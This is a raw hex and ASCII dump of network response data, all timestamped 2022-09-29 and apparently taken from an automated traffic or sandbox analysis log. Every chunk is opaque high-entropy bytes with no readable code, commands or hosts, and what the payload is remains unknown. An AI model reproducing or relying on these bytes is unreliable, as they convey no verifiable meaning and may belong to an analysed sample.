                                                                                                                                                    2022-09-29 12:59:10 UTC14218INData Raw: f2 c0 7d f2 51 7a 97 56 b9 31 47 79 38 25 37 0c 46 d8 15 47 17 13 b2 cd f3 b3 ef 76 aa 68 58 7e fd f2 2a c7 a3 56 93 88 59 da 72 37 58 f2 26 d8 3c e2 00 03 5f 5d ce af c8 49 d5 1c dd d0 c6 ef 47 04 dc 82 2a 11 8a 52 0d 87 e0 48 c8 cb 60 fa 55 63 f6 47 4a 3b 99 4e f8 d0 e2 e2 11 19 a3 41 e6 9c 1e 16 fb d6 f9 1a 40 cc 61 a5 fe ed f9 54 1a 91 01 fa 2e 81 f9 95 1f 46 be 1d 94 d7 2d 62 90 c5 98 a8 db 22 26 fc 2b 3a a6 d1 c0 34 c0 ba 90 7a ac 72 da 19 5c ea 90 15 f1 cd 78 e4 cf 09 b1 be 6d 86 f4 9d 75 a0 16 f5 98 88 d4 ae 3f 9f 88 f7 c9 91 b5 89 97 0f 22 6f ff a7 59 b4 73 8a 11 55 d2 73 00 da aa 50 4d 80 a2 dc 59 9e bc 3b d4 04 e6 fc 3d 3c 5a 95 aa 59 0c 0a c8 9b 7f c1 05 e6 bf 4c 4a d3 9f 92 78 39 76 bd 8f 77 f4 a2 11 18 e0 08 8e 50 f8 14 7d 53 9d f9 79 59 1a
                                                                                                                                                    Data Ascii: }QzV1Gy8%7FGvhX~*VYr7X&<_]IG*RH`UcGJ;NA@aT.F-b"&+:4zr\xmu?"oYsUsPMY;=<ZYLJx9vwP}SyY
                                                                                                                                                    2022-09-29 12:59:10 UTC14234INData Raw: bc 7c 8a d2 d4 20 d9 e6 68 12 28 c1 a6 97 f4 3e 16 c8 21 80 79 04 26 5b 6b 2d aa 53 5c 1c ef 3d 14 93 c4 26 8d c7 02 d7 a9 47 95 cb fd 8b af fc d3 07 00 bf 37 e0 80 0c ee 3e 41 0a 12 5d 22 b1 04 47 07 40 fd b4 05 0e 37 4d cd 40 36 33 c8 2f 6b c3 7f cc aa 19 1d bc 7f f0 da ea b8 c7 e7 fe 7d 4e 9e f1 ba e6 85 f7 2c 72 b9 de 31 a9 1f 4f 5c 70 25 0a 77 2e 6d a6 aa ad de 62 8e 94 a9 79 c6 8d be 83 2a fc 45 f6 83 05 1e 90 ba a5 84 04 5d fd e5 88 f9 09 c5 bf bf be 7b 7c 53 b8 ba d4 85 05 5a 74 7e 0e b4 71 b2 bf b2 b4 a1 b8 32 ad 6a cc 16 eb ce 48 03 01 4b 93 80 26 8d 80 6d e1 1d 59 13 81 7c f9 73 f9 28 00 c8 37 88 20 97 76 2c 03 8e 1d c6 ca 19 3d 00 92 85 a5 7d 8c 87 a9 51 0f d6 48 ec af 72 d4 53 b3 15 5d 0a de 47 8e 4e 0b 8a ef e7 08 60 ee 37 54 92 87 c3 da 85
                                                                                                                                                    Data Ascii: | h(>!y&[k-S\=&G7>A]"G@7M@63/k}N,r1O\p%w.mby*E]{|SZt~q2jHK&mY|s(7 v,=}QHrS]GN`7T
                                                                                                                                                    2022-09-29 12:59:10 UTC14250INData Raw: fb 1d 7a ef a1 66 29 a7 79 e0 74 93 b2 70 95 d0 20 a7 c7 6d 52 7b 9a 4b ff 4b 79 ce ea f0 f4 a9 be f6 80 7c e1 c3 b2 22 74 c1 c6 bd 0d cc 25 5f 40 f3 d4 b1 0b f7 97 13 a6 d2 c4 f9 19 cd 59 26 ec e4 40 af 38 9b 42 ed ba 43 96 aa 26 fe 03 5c ea bf c6 1f 6b 7e d4 76 f4 b0 99 4a bc 6d 7b 6a 2f 73 92 3c e0 81 82 14 6f 4d 99 02 3f 41 ad 69 c3 7f 75 9e 9d cb 17 f9 26 5f 30 e0 7f 4f 6f 10 ca 97 4a b2 a4 ee b6 a5 95 da 74 ac 8c e9 8c 46 ab 16 62 c0 75 71 54 eb e4 e8 76 61 16 02 d1 2b 4e cb f0 f9 b8 ba 94 78 e6 df 40 b9 b9 e0 da 6b e1 7f 04 0a 65 98 fa 51 1c b3 48 22 ad 53 70 30 bb 69 5b 0d f0 1c 25 d6 ba 58 f7 af 60 9b 3c e6 e9 6e 86 20 e6 02 f9 70 2e 20 20 c8 88 59 be b6 b6 e1 c5 76 f7 67 43 e7 c0 bf 77 58 86 ed e3 c6 9c be 60 59 cc 1a fb 47 7e e3 46 e7 0a e8 03
                                                                                                                                                    Data Ascii: zf)ytp mR{KKy|"t%_@Y&@8BC&\k~vJm{j/s<oM?Aiu&_0OoJtFbuqTva+Nx@keQH"Sp0i[%X`<n p. YvgCwX`YG~F
                                                                                                                                                    2022-09-29 12:59:10 UTC14261INData Raw: b7 49 36 6c 72 56 ab 24 7a 6f 55 cc 88 80 a7 5f e6 26 ff a5 f0 d9 34 65 dc 49 46 81 bc de 42 5c 75 a7 d8 57 e6 08 ca 1b 41 a4 58 ba b7 8f f1 21 c7 b7 f3 ca 46 0f f7 c2 8b 69 f3 db 49 a0 39 9c 02 a8 1e c9 d6 1d a0 08 a1 25 47 43 40 cb 30 07 12 92 da fe 68 c6 c4 82 a5 29 64 d9 28 c4 4e 7c b8 4e 95 ed 6a fd 72 ed 3c ab 8d f4 a0 a1 81 c8 93 bf 79 4d 84 76 df 2e c7 0a cd 6c 76 96 e2 b6 51 1b 29 3d 95 4c b7 bc d2 f4 f1 7a 14 ba a8 cf bd ea ff ee 29 f3 97 f9 80 10 47 91 20 0d 92 7d 52 f9 94 f8 5c 28 86 aa 52 6d ef 4b 37 46 47 46 0b 42 cf 73 34 1f 80 fc 54 0d 9d fc 89 43 82 de a6 27 b4 6d c4 5a 86 69 aa e0 f1 59 17 7b 65 f3 d6 fd 8e 5c 89 fe 62 11 e4 36 8f 88 ff 84 f5 36 7f 68 38 17 9b e0 7f f3 f1 85 99 26 65 06 cb 99 89 82 d7 44 53 ac c3 c5 c0 12 9a c6 d6 b4 90
                                                                                                                                                    Data Ascii: I6lrV$zoU_&4eIFB\uWAX!FiI9%GC@0h)d(N|Njr<yMv.lvQ)=Lz)G }R\(RmK7FGFBs4TC'mZiY{e\b66h8&eDS
                                                                                                                                                    2022-09-29 12:59:10 UTC14277INData Raw: f6 43 81 f4 43 dc d5 b8 6c 34 33 08 e0 fc c4 ec 48 b3 5c a4 9a ce 40 44 ed f9 f9 08 27 c4 3b e7 d5 18 bf d2 17 23 71 70 96 e8 f7 01 bd bc 22 5e 8e aa de 54 31 39 21 40 19 b6 39 e5 58 f3 ec 56 63 36 98 18 a8 f4 81 fa a6 d8 75 40 d4 40 39 32 ea 57 ff 03 76 87 8b 33 44 fc 8b 4f 68 7a 62 7a 5f c6 b3 39 cf 3d 2b 80 70 10 9b 66 20 7d bd fa 63 ed a7 46 64 90 47 8b 90 79 1f 16 46 16 58 45 b1 64 bf 6c 4d 77 ff 17 96 f8 8f 65 67 b1 bb 53 b7 d1 4c 3d 8c a8 b9 4d df fa 16 e9 ba 32 22 60 32 52 ae 4a 23 4f a9 2b a1 06 cc ad 96 3f ec 1f db 02 53 10 bd 8e 8b 21 b2 4a 71 56 af a1 4a 30 cf ba b3 1c 83 35 86 bd d0 1f 02 45 2e d8 c6 6d ac 88 d4 5b d5 4c 00 13 c9 2f 8d e4 10 46 4b 0c 86 07 61 d0 0f 3f e4 48 30 4f 33 5d b8 89 b9 a8 bc 65 87 6c f9 df 03 6b 57 a2 f3 95 c4 32 0d
                                                                                                                                                    Data Ascii: CCl43H\@D';#qp"^T19!@9XVc6u@@92Wv3DOhzbz_9=+pf }cFdGyFXEdlMwegSL=M2"`2RJ#O+?S!JqVJ05E.m[L/FKa?H0O3]elkW2
                                                                                                                                                    2022-09-29 12:59:10 UTC14293INData Raw: 3e 34 50 68 b1 51 79 77 b8 83 ab a6 5e c6 db 2b a0 2b dd bd 3c 4c ee 62 12 e6 ad b1 5f ba 91 65 36 bb c9 ea b4 ef ba 21 2d a8 28 62 34 0c b9 86 b7 6e 3d 5c ab b0 58 51 f0 64 25 dc 5f e7 e5 77 16 b9 62 0f 4e c0 d9 63 80 78 c1 34 8c 10 a7 75 5b 50 6b 1a d7 f6 70 c5 0b e9 62 24 28 29 e6 5e 62 93 6f e1 c4 95 e6 9e a5 b6 d5 2c 9e 41 d9 d6 9d 7b 06 40 6e e5 e4 d7 34 33 5f ee 05 67 10 da cb 32 ed d9 47 7a a7 22 f2 d5 af 0a f4 2c ec c3 14 9b bb fa 48 7d a7 ce 25 ce ce 3e 1c db a8 0b 12 f6 a3 21 68 8d ee 02 18 98 6c 8d 88 28 03 ed 5d ed 2b c8 51 ff ac f4 82 43 88 d2 dd 3d 3a a1 91 6d 76 57 4f 98 1a 05 4d aa 86 a6 c5 f5 05 e2 8a 79 b9 43 4a be 5b 65 5a cf fb cb 31 09 28 08 a9 a2 96 56 c3 34 25 de 77 73 57 05 cd ee ab ba 3e af 2b 90 b2 c4 e3 87 fc 08 db 2d 3f 77 1c
                                                                                                                                                    Data Ascii: >4PhQyw^++<Lb_e6!-(b4n=\XQd%_wbNcx4u[Pkpb$()^bo,A{@n43_g2Gz",H}%>!hl(]+QC=:mvWOMyCJ[eZ1(V4%wsW>+-?w
                                                                                                                                                    2022-09-29 12:59:10 UTC14309INData Raw: e2 08 5f 72 3b fa 3c d0 84 d5 15 00 86 c8 d4 e6 e5 44 f9 36 dc 2d 95 d8 89 e3 d5 a4 0c 1a 43 01 8a 1a b7 28 31 e7 ba d8 cd 2b fa 25 5a 11 cf a6 b2 4b 74 d7 0f cb 07 ed 9f 5f 0a 97 ab 45 d8 38 ac 9b 90 d3 c5 13 03 0b d3 e5 f2 dd ed c1 02 1a 76 f7 0a 29 c0 42 12 97 19 e3 ca b9 79 1b c4 0a ac b8 37 50 33 2c 1e 57 9c bc b6 d5 bc 4c b9 58 9c 1b 51 62 6f 71 bb 57 f8 73 c8 c0 63 57 3f 4b d2 c3 29 dc 64 5f 01 b7 80 79 74 a2 a1 5a f4 51 32 ea 27 79 fa 2b 24 4b 45 dc ea e5 23 e3 77 83 33 d5 f8 2b 16 47 bf a6 ec 77 f2 3a a8 6b 9e be de 9c d4 58 e8 c7 2d 7e eb ee 6b 97 b2 f6 79 37 e3 3f 6d 99 27 55 f0 ac 3d a7 3e 47 c3 78 04 83 ff e3 e0 83 4e db 1a ca 84 80 74 4e 2e 38 f4 92 5a 26 4d 1a e6 b7 a3 9f ea ce 54 6f ad 42 f8 56 c6 c5 1c 5e b2 f5 f6 2c 0a 97 2c ed e5 76 85
                                                                                                                                                    Data Ascii: _r;<D6-C(1+%ZKt_E8v)By7P3,WLXQboqWscW?K)d_ytZQ2'y+$KE#w3+Gw:kX-~ky7?m'U=>GxNtN.8Z&MToBV^,,v
                                                                                                                                                    2022-09-29 12:59:10 UTC14325INData Raw: c7 f9 5e 14 db 50 c3 cb 74 5e df d7 56 52 a4 7e df 32 f0 63 b6 d1 fc 52 52 5c 4f 47 c9 c9 97 b3 20 cc f3 45 c6 aa ed 95 61 88 1e 21 bb 3d 56 7d 11 f5 a0 a5 63 1a eb a1 59 9b 3d 42 de a3 2b 58 8d 80 57 a9 99 6f 82 da 3e 9f 53 96 fa 72 78 59 d4 ee e0 54 8b cd e9 e6 b8 7e 18 97 16 cc d2 cd 97 66 66 80 39 24 9d df 81 31 63 2d 9f c3 32 9b f8 a6 61 9e d8 19 94 02 02 48 e2 9d fd 60 34 24 6b 08 90 e9 38 a5 73 e4 68 eb f3 54 d3 d8 cd 80 71 6e 63 d5 48 4f 92 95 10 b6 90 57 f4 5e 29 bc ec 7d ac 6b 1f e1 b2 b5 1e d5 38 d3 e1 ed f3 39 34 0c f6 f1 1d 6b 00 f7 e6 bf 0a 12 6c 46 91 18 c5 4d 73 3f 19 7f fe 71 b5 61 1f 59 d9 7e 13 34 3a 29 37 07 17 91 68 1e 62 df 19 ce b9 e6 41 1b 30 9c f0 b0 63 82 14 68 66 d6 38 9c fd ee 5a 81 97 7d 3b b0 38 ee dc 47 6f 7d 8b d3 37 ad 8a
                                                                                                                                                    Data Ascii: ^Pt^VR~2cRR\OG Ea!=V}cY=B+XWo>SrxYT~ff9$1c-2aH`4$k8shTqncHOW^)}k894klFMs?qaY~4:)7hbA0chf8Z};8Go}7
                                                                                                                                                    2022-09-29 12:59:10 UTC14341INData Raw: ee a5 dd c9 18 8e 8a bd 59 d4 68 12 30 e8 c0 11 8a 13 57 7a 7e ba 13 23 70 6b 5d 2d e9 d4 93 06 58 27 a3 80 90 2e 67 9c e4 e2 8f 88 58 eb ca 93 34 b9 ea a7 2a 17 bf 0e 04 d0 b6 2b db 80 2d be cd 22 7f bb 31 5c 25 03 f4 f2 9f ca c2 b5 ad 07 38 63 94 ab 27 d3 99 bb 43 31 58 56 30 c4 60 ae 13 47 6f a0 9f cd ac 6d d9 33 dd 95 a7 8f fd 44 0f 5a a6 24 78 10 fc 0a 1c bc c9 39 6a 45 d9 b1 40 6b 91 bd 59 8a d7 a2 75 75 ee 9f 51 79 14 99 ad cd 5b 8c 18 71 f9 38 3c 22 4a 5a 9e bf 2d 78 aa 06 d1 e9 a6 88 4c d5 e5 9d 92 98 20 56 d7 22 d9 b3 ad b7 4e 48 48 de 7c 97 d6 ad b4 32 43 d9 14 41 63 3f 6d 33 34 56 54 9b e6 04 45 cc fd 88 85 c0 66 2b 38 95 d4 fb be e1 61 3e 66 e9 01 e7 42 c9 9f c6 14 f6 b3 d8 a3 96 3c 35 3b 73 9e bb 2f 48 46 f4 48 1f 05 e7 c9 62 40 5d 3e 50 80
                                                                                                                                                    Data Ascii: Yh0Wz~#pk]-X'.gX4*+-"1\%8c'C1XV0`Gom3DZ$x9jE@kYuuQy[q8<"JZ-xL V"NHH|2CAc?m34VTEf+8a>fB<5;s/HFHb@]>P
                                                                                                                                                    2022-09-29 12:59:10 UTC14357INData Raw: f8 2e 43 d3 e5 de cb ad 74 49 b7 f1 0b 6b 70 2b 99 49 4e 6c 35 65 4c 57 cb f2 e8 a7 e5 e1 57 71 84 89 92 5a a3 42 88 71 91 6b 8e 1a 42 d1 d8 5b 84 20 4b be 75 b8 0d 07 eb 6e 90 fb 60 57 a6 96 c3 6c 69 73 55 0b 1d 40 10 42 36 c5 58 65 cf 75 e5 e3 cc d4 72 05 77 76 2b e8 2e b6 ec b8 ad 58 1b 21 6e cd f3 49 68 f4 6d d6 19 80 44 05 62 3d 24 fb 25 2b 40 f4 0d 15 39 58 a3 e2 28 a5 e3 29 9e f8 a5 7c b0 a4 d7 66 ca 54 5a 33 30 86 5f 25 e0 a4 0c 21 d0 2b c9 66 90 51 23 1a 3b 2c 6c f6 e2 80 32 3a c7 20 12 f9 49 f0 e5 cb b3 c6 a9 a7 b9 02 fd 34 49 c5 cd 35 44 01 84 ac f6 08 ee f8 cc 61 d7 5b 5e 70 9b 13 9b ac 58 3c 0d 2a da 73 5a 45 49 32 99 f6 5f 34 dd da 01 15 c2 ef ee 39 ec 35 d5 f4 ef 90 29 bc be 12 8c 99 fe 74 28 d7 b8 91 79 d3 04 f9 fd ad 75 d5 8f 57 fb 41 3b
                                                                                                                                                    Data Ascii: .CtIkp+INl5eLWWqZBqkB[ Kun`WlisU@B6Xeurwv+.X!nIhmDb=$%+@9X()|fTZ30_%!+fQ#;,l2: I4I5Da[^pX<*sZEI2_495)t(yuWA;
                                                                                                                                                    2022-09-29 12:59:10 UTC14373INData Raw: 9b 08 9b ad 42 a9 85 b1 0f f5 6b c8 1d 9a 80 b4 d3 d6 63 e8 3a 8d d8 74 db cf 85 a6 de 6f 38 fe 3e 8e 31 22 f1 e0 5a f9 9f 1e 3e 58 27 4e 45 90 41 06 dd 2f 46 d9 54 5c c7 a9 a6 36 8b 4d 4f 3c c4 1d ac 9e 26 52 09 8a ed 8f 16 72 55 0e 1c 12 0f 46 f9 b2 7a 9e 74 46 28 27 cc 6f 3f d6 9e cd 83 90 cb 3f a2 c8 15 7f 6d 79 87 f0 3b 87 2b f8 5d 7d 9d a4 f4 3f aa 21 6a ba 9d 3e 0f f9 f1 dd 0e 84 59 13 c6 59 7a ad 3b aa f5 96 c1 5a 68 42 34 21 11 40 cf 50 13 64 42 e0 26 48 79 93 f5 4b 34 52 ca d7 a7 eb 26 c0 d2 74 a6 e6 6a 1f 84 25 55 21 6b 68 0d 84 9c 93 93 74 51 f3 2a e1 d2 ec 40 c7 d7 69 e9 62 8a f4 a2 31 4d 96 47 e7 7d be d3 07 02 c7 e7 6b 7d 32 79 0e c0 6b 77 26 ac 5f ed 79 20 74 7e 6f 4f 05 a1 38 bf 04 60 7d fe 5d d1 35 28 36 3c bf b8 f6 e6 af 28 39 1a 88 a8
                                                                                                                                                    Data Ascii: Bkc:to8>1"Z>X'NEA/FT\6MO<&RrUFztF('o??my;+]}?!j>YYz;ZhB4!@PdB&HyK4R&tj%U!khtQ*@ib1MG}k}2ykw&_y t~oO8`}]5(6<(9
                                                                                                                                                    2022-09-29 12:59:10 UTC14389INData Raw: d9 d2 45 d5 2e 27 a3 4e f0 bc 4e 52 fe 43 13 22 c2 9d 9f b6 52 8e 41 c0 72 f8 14 59 a4 4d e0 21 fd 6b 8d b3 b6 f8 ba 6b b6 6b 85 36 4e 6c ec f0 72 a0 6d 6f 4b 3e 61 37 44 05 cc 61 e8 6d 38 3e 96 01 50 71 d3 aa 32 0b 78 84 b5 45 6d 0a e4 50 69 0f 29 8d a2 6b d6 e6 b6 88 47 88 d1 f9 f6 f3 7f 08 5f 4b 39 c7 59 5e 51 a1 9c 85 9d 78 f3 72 aa b8 d5 45 cb 21 63 0c 02 b1 37 e9 ab c4 ed 77 bc 51 30 e4 0c de 10 b6 6f d2 06 a1 43 c7 60 1c 57 67 89 38 86 75 bf 34 b3 3e 96 1b d0 88 c3 a3 4c 50 1e 9a 89 da af 1e b9 6d b0 ee 42 91 93 c5 5d 2d 78 aa 22 9f dc 20 ec c8 ae 5f 63 fc d7 4f a6 7c 70 6f 89 80 1f ac f5 b9 bd 76 01 7b 35 4b 9e 38 c4 a2 e6 9a d5 a7 7a f6 78 12 8d 06 11 41 b2 dd da 71 b0 2e 9d b1 3e 32 d8 ba 49 f5 24 4b 53 2b 23 3a 0a ca 77 a2 c9 48 4f fb 9a c1 eb
                                                                                                                                                    Data Ascii: E.'NNRC"RArYM!kkk6NlrmoK>a7Dam8>Pq2xEmPi)kG_K9Y^QxrE!c7wQ0oC`Wg8u4>LPmB]-x" _cO|pov{5K8zxAq.>2I$KS+#:wHO
                                                                                                                                                    2022-09-29 12:59:10 UTC14405INData Raw: 11 18 b0 29 d3 46 2e 4e 3b db 5d 9b d5 44 7e 6a 70 da 1f 85 22 63 0d b2 00 70 97 59 6a 16 38 15 41 ac 3b db fc 1f f2 f6 52 cc 67 cf fd 01 16 73 1e 51 45 e0 71 aa 3a fa 63 a4 8e fb 16 03 53 d8 ae b5 7f 47 d2 52 32 b7 08 0b ee 70 b0 c6 aa e5 88 77 33 57 88 60 07 8d fa 39 9f bb 4e fc ea a7 eb a8 42 ff f7 79 f4 89 7e c9 ac 3d 9e 43 0f 28 27 67 80 0e e7 d4 33 75 5d 99 1c ac 17 b3 33 fd 26 8a 70 e7 36 50 b9 c4 f4 e2 eb ab 5f de 16 3a 71 be 34 00 37 eb 43 c8 24 82 ae b5 48 1b 14 11 e5 86 4f 79 2d b1 91 c4 8f 7a b7 c8 a9 b0 94 3b 00 07 03 07 a3 f6 ed e3 d9 0b bd 73 d7 d3 b7 be 36 8b 82 8c 14 4a 8e 0e c2 b8 45 f0 12 0f 06 6c eb 44 c3 3a 4a 18 08 fc 84 34 42 7d 2c 20 6e 02 33 7c 7a 59 af fc 02 8e 29 76 6a 74 df 5d cf 68 00 a4 0a 6e 32 71 f6 be 8e 04 2e 39 be 17 74
                                                                                                                                                    Data Ascii: )F.N;]D~jp"cpYj8A;RgsQEq:cSGR2pw3W`9NBy~=C('g3u]3&p6P_:q47C$HOy-z;s6JElD:J4B}, n3|zY)vjt]hn2q.9t
                                                                                                                                                    2022-09-29 12:59:10 UTC14421INData Raw: c6 23 dd 63 c4 85 16 ac 90 61 78 ed 10 ea ad 47 ee a1 9e 79 39 75 89 55 91 be 50 8d 17 66 94 7c 85 0d 5d e3 5f 88 fa 4d f5 da 74 9c dc f4 66 b1 59 42 f6 d2 b7 4f 42 35 10 ff 41 14 4c 9d 3b d9 65 1e 5c 97 14 44 aa 09 e7 d4 a9 ee 9b 38 4b 21 8f 89 8e 4c 72 26 4f 2d f4 ee 8e 96 a1 a9 61 a9 d7 d2 77 dc 96 f4 df b5 09 68 a6 c8 4d 50 6d 24 be 87 9b cf 01 6d 3a a5 43 b0 1d ef 41 2e 27 c8 d9 d0 08 14 fd 59 e5 ff 6a ac 7d ab ab e0 6e c5 7c 0b e9 b3 c8 bb 5b 1d b8 dd 69 43 af 3e 73 bc 0a 48 9a 13 b4 7b c2 0b 4a 9b 57 1a cd 0d 18 2e cb 82 58 80 b6 59 71 7c a4 36 20 bb 90 ab ad d9 e7 b6 82 be d8 1a bc e3 a5 9c 1b a4 f6 c1 4b c6 53 83 cb 74 d9 22 8f 2b 2e 66 3a c2 06 a9 54 87 aa d0 14 2f 56 ab 94 d3 1d 5f bb a3 11 c8 5e 49 8c 46 da 6e 3c b9 3f fa 84 a1 0c 87 0e 53 11
                                                                                                                                                    Data Ascii: #caxGy9uUPf|]_MtfYBOB5AL;e\D8K!Lr&O-awhMPm$m:CA.'Yj}n|[iC>sH{JW.XYq|6 KSt"+.f:T/V_^IFn<?S
                                                                                                                                                    2022-09-29 12:59:10 UTC14437INData Raw: 7c e0 49 8d fe 4b 98 47 90 50 14 ac e3 61 ce 49 22 37 cd e6 f0 3e 20 cf 11 6e 78 79 e9 0a eb 12 cf c0 05 95 8a 15 8c cf 53 88 3f a0 bb 2e e8 f9 46 14 44 50 41 52 0c 87 d7 a4 28 a0 ae 12 4d cb 68 bc 7d a3 11 fb 40 c6 34 25 ff ac 61 a1 b6 94 01 f1 f9 7c b1 5c 0f 80 97 f7 9c 6d 53 46 be 87 05 03 b9 65 72 1b 75 75 4d 6a fc 16 df 97 28 7c 81 9d 67 10 07 02 7e b6 68 20 d0 d2 b5 15 b4 20 98 2a c0 fe 3f e8 1b 4b 8c 5f 7f d8 ad ab 84 20 c1 ee 8f b4 7a 93 ff c4 2e cd 3c 1b 7b 66 bf 06 09 69 0a 46 17 2a 66 90 a5 6a f6 07 4e 1b 89 57 68 37 56 89 b4 a8 98 1f 81 2a f2 2c 60 cc 9a 78 94 29 68 0a 60 1c e9 cf 9a 87 34 28 89 09 85 2e 9a f3 37 26 d1 71 de ad 8a 5f 47 b8 d2 92 7c 90 e5 ec 26 41 f3 68 27 aa 3e b8 05 4c 2b fe 60 b7 ed 9b 63 a2 ad 82 99 65 2f 54 bf 52 b8 6c 38
                                                                                                                                                    Data Ascii: |IKGPaI"7> nxyS?.FDPAR(Mh}@4%a|\mSFeruuMj(|g~h *?K_ z.<{fiF*fjNWh7V*,`x)h`4(.7&q_G|&Ah'>L+`ce/TRl8
                                                                                                                                                    2022-09-29 12:59:10 UTC14453INData Raw: 46 39 bd 02 4b 60 45 11 ff f7 ed 66 67 7c 0d ea 8e 1c 1f 40 47 c6 c9 96 69 e5 f9 50 21 bf 97 4d 4a 27 4e 4f fa d6 8d a8 df 79 78 c1 92 aa 94 07 eb 9f 14 d7 d6 bf 20 e8 da 42 7a 1d 74 78 45 f8 ef 83 70 8c be 63 e6 b9 21 01 5a 71 a1 15 2e 67 9a 4a d0 a2 88 7f 7a 78 fd 28 36 6c f9 e8 62 ea e1 41 69 a2 47 6a 73 1b 53 8a b5 ff 9b 80 58 56 05 94 a8 62 72 db 06 8c ce 37 70 7e f4 6c 72 43 38 d6 00 d7 a3 c8 49 0f a6 41 cc 47 2b 72 a5 d0 7b 58 29 d2 0f f9 38 b3 9a 77 f3 71 59 47 78 b0 b8 3e c6 9f 3e fb 88 fb 13 73 61 71 29 11 0a 8d 13 1d 58 b8 8e 74 f6 26 aa e2 17 32 45 15 e1 90 73 4d a8 49 aa 55 a9 c0 d0 87 5f 79 00 0e 5f 8b 5c db 85 bc b2 c8 c6 c9 c6 58 c2 37 9c e2 91 e7 14 da 9a 16 5a 2d 4a 7e e5 21 69 7d 3d d5 63 99 26 97 93 b6 10 c8 20 41 21 c9 64 4b 63 3d 30
                                                                                                                                                    Data Ascii: F9K`Efg|@GiP!MJ'NOyx BztxEpc!Zq.gJzx(6lbAiGjsSXVbr7p~lrC8IAG+r{X)8wqYGx>>saq)Xt&2EsMIU_y_\X7Z-J~!i}=c& A!dKc=0
                                                                                                                                                    2022-09-29 12:59:10 UTC14469INData Raw: 6e 75 25 02 53 01 9f e1 bd 1b c2 e6 db 8b d0 94 16 20 46 18 50 88 54 07 00 64 f3 cb c8 70 c8 64 e8 09 80 32 17 c4 1c 0d cd 2f 0a ac e1 f2 bf c1 86 85 2c 39 ef f9 2a 39 82 45 78 aa 01 80 2d ed 65 8a dd 04 fb 55 c0 69 9b 67 c8 09 f0 d7 c9 6f 77 7b bf 9a c3 ed b3 4d 5f 9b 3b f9 98 b7 fa b2 01 8b 2b 45 ae 08 a9 1e f7 dc 47 04 23 7b 57 26 23 c9 9a 12 37 61 3a 49 55 1e d7 9e 9a 10 d8 8b 9d 21 d2 ec 5f 16 fd 29 19 63 e8 a2 a7 fe 63 94 3b 59 43 25 ee b8 be 38 e4 d1 0e e1 8b 59 27 ba 1f 08 3e 33 dd fb f6 60 84 88 57 49 cd 40 20 22 f2 d4 19 3e 46 9f 3a a7 43 c9 26 0c 7a 2a b5 2f 26 28 28 c4 af bf 3a 4d 20 ec 12 17 32 2d 68 13 cf d6 bc 0f b1 57 6a eb a7 f6 46 a0 ec 0e da 8a f1 89 91 ea 36 d2 a1 c2 e8 53 5a a6 d6 de 7e e0 24 2b b5 02 e5 87 aa e3 66 d5 e3 8e 74 04 1d
                                                                                                                                                    Data Ascii: nu%S FPTdpd2/,9*9Ex-eUigow{M_;+EG#{W&#7a:IU!_)cc;YC%8Y'>3`WI@ ">F:C&z*/&((:M 2-hWjF6SZ~$+ft
                                                                                                                                                    2022-09-29 12:59:10 UTC14485INData Raw: bf a6 98 ef 40 ef fa d8 cc 4b 6b c5 31 e4 48 58 41 f1 42 49 6c 9b ec 8c e2 42 30 ac f3 10 e5 bf c8 42 d5 d7 3a be f8 9a 44 eb 65 cd 4b aa b6 b2 37 ef bd 5f e9 fe 9d cf 0b 0e 6c ef 7b 53 34 38 71 1a b0 34 56 4d 7b c4 da e2 a8 51 d9 a2 94 62 68 cf d2 2a 68 39 1f 1e fa ff a3 c7 41 10 fb 35 ea 2d db 84 ee 10 a2 55 61 a1 fd 2c b9 c5 af c8 be 76 7b 3f e9 49 37 03 75 69 81 6b ef 38 74 b8 3c 0a 0a 53 91 b4 28 d5 9d 2b c3 3d d1 cb db 90 fd f9 6a c1 06 93 49 10 94 dd de 89 8c 69 27 47 88 98 c4 73 15 68 5a 31 04 d3 a1 32 a4 11 b4 b2 e2 9c ed 54 58 eb 0f 62 35 9b 12 08 13 0f 68 f4 3f 10 88 63 f2 7f 84 68 44 fe 26 2a 9a d5 e6 62 59 6c 57 fa 13 d6 0b 3a b5 72 7f 15 78 a3 0c b9 65 ab c0 65 74 e0 83 af 4d d6 9b 4e ea d7 bf 91 aa 96 2f ff b2 3d 43 81 ca 3b 0b 49 56 43 d1
                                                                                                                                                    Data Ascii: @Kk1HXABIlB0B:DeK7_l{S48q4VM{Qbh*h9A5-Ua,v{?I7uik8t<S(+=jIi'GshZ12TXb5h?chD&*bYlW:rxeetMN/=C;IVC
                                                                                                                                                    2022-09-29 12:59:10 UTC14501INData Raw: 3b 0f 9b ef ef ab 68 67 fb 6e 5a 5b f1 0d 0e 1a 78 d8 fd 3f dc 16 ab fe 94 54 b4 5a 63 96 5d 58 a3 be 68 4d e6 3b 38 5b f3 95 f9 49 ab 64 39 cd f2 26 7c ab 64 f3 db e3 50 c7 4e 96 da 66 26 b8 e2 b4 13 ca 34 60 c4 bb 0c da 4b e5 03 84 ca ed d2 22 c9 5e bd d7 89 57 94 98 cb 5b c0 d3 a2 19 d9 b4 88 a1 5b 58 11 29 d7 bc a9 29 34 3c 4d 6b 27 6e ac ca 55 82 b2 f0 77 87 50 50 81 ae fa 60 9c 01 6e 77 5f f5 c3 6b b6 b9 54 0d 5c 61 81 5b e7 04 c5 79 46 94 12 30 61 dc f7 cf 71 1c ed db 08 59 63 b4 0d 5f a1 04 b2 65 7b b5 33 b3 89 1b 02 17 7d 7a 36 98 8e 98 0a ac 09 ef d0 1a ad bf 8d d5 4d d4 59 2b bd 26 be 81 9b ed d6 e8 3a 3d a5 11 10 37 30 70 4c dd 01 f3 d8 77 e7 10 3d 4e 52 57 d8 3f 0e d9 89 2b aa 4b fc a9 96 63 37 9b 5b da 34 44 64 09 73 bb e8 85 7d 8b a0 3d 61
                                                                                                                                                    Data Ascii: ;hgnZ[x?TZc]XhM;8[Id9&|dPNf&4`K"^W[[X))4<Mk'nUwPP`nw_kT\a[yF0aqYc_e{3}z6MY+&:=70pLw=NRW?+Kc7[4Dds}=a
